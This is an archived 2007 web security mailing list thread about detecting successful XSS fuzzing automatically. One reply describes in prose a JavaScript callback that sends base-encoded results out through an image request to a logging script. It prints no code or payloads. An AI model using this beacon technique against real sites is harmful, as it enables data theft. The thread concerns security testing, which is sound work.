[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [WEB SECURITY] How to detect XSS in an automated fashion

From: <gaz_sec@xxxxxxxxxxxx>
Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion
Date: Thu, 30 Aug 2007 02:17:59 +0100

True my Fuzzer works in the browser, so it doesn't need an 
interpreter:-
<http://www.businessinfo.co.uk/labs/jsfuzz/fuzz.php>

I'd imagine the best way to do a XSS fuzzer would be through the 
browser as well. I guess the way to run a scan on an external site 
would be to initalise some javascript using javascript: to create 
your logging function call. IMO of course.

On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman 
<Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>Of course, that only works if your web scanner has a JavaScript 
>interpreter!
>
>Billy
>
>-----Original Message-----
>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>Sent: Wed 8/29/2007 3:03 PM
>To: websecurity@xxxxxxxxxxxxx
>Cc: travisaltman@xxxxxxxxx
>Subject: Re: [WEB SECURITY] How to detect XSS in an automated 
>fashion
> 
>Hi Travis
>
>I've wrote a HTML/JS Fuzzer in which I encountered the same 
>problem. I decided to create a simple javascript callback which 
>was 
>executed on successful fuzz. I base encoded the result and sent 
>the 
>information via a normal HTML image (really a PHP script) which 
>logged the results.
>
>Cheers
>
>Gareth
>
>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman 
><travisaltman@xxxxxxxxx> wrote:
>>I am trying to run through a dictionary of XSS attacks (aka 
>>fuzzing) on a
>>web application.  What is the best way to determine, in an 
>>automated
>>fashion, if each attack was successful?  Would I simply review 
>the 
>>source
>>code of the response to see if my attack was encoded or filtered?
>>
>>http://travisaltman.com
>
>--
>Click to reduce wrinkles, increase energy and drive - anti-aging.
>http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky07
>XGWad22ySq1P1RSIOW/
>
>
>-------------------------------------------------------------------
>---------
>Join us on IRC: irc.freenode.net #webappsec
>
>Have a question? Search The Web Security Mailing List Archives: 
>http://www.webappsec.org/lists/websecurity/
>
>Subscribe via RSS: 
>http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

--
Click to find local singles for dating, romance and fun
http://tagline.hushmail.com/fc/Ioyw6h4emOcMbpU6y7Wp4dVW3NbabKGJecviu8UIVOEAcIW3ojY1PU/


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Prev by Date: RE: [WEB SECURITY] Why JSON/JavaScript hijacking only works on Mozilla
Next by Date: RE: [WEB SECURITY] How to detect XSS in an automated fashion
Previous by thread: Re: [WEB SECURITY] How to detect XSS in an automated fashion
Next by thread: RE: [WEB SECURITY] How to detect XSS in an automated fashion
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site